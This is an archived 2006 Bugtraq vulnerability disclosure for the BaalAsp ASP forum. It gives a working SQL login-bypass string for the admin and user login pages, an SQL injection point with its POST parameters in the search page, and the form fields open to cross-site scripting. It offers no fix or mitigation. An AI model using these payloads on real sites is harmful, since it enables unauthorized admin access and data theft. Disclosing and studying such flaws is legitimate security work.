lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20061115174425.10838.qmail@securityfocus.com>
Date: 15 Nov 2006 17:44:25 -0000
From: saps.audit@...il.com
To: bugtraq@...urityfocus.com
Subject: BaalAsp forum [login bypass ,injections sql(post), xss(post)]

vendor site:http://baalasp.com/
product:BaalAsp forum  
bug:login bypass, injection sql post, xss post
risk:high

authentification bypass :
admin login bypass ==> /adminlogin.asp
passwd: 'or''='
user login bypass ==> /userlogin.asp
user: 'or''='
passwd: 'or''='

injection sql (post)
==> /search.asp
variables : page=1&total=1&search='[sql]
or just post your query into the search engine

xss post : 
/addpost1.asp?
vulnerables fields :
- Subject:
- Group Name:
- Message:


laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@...il.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ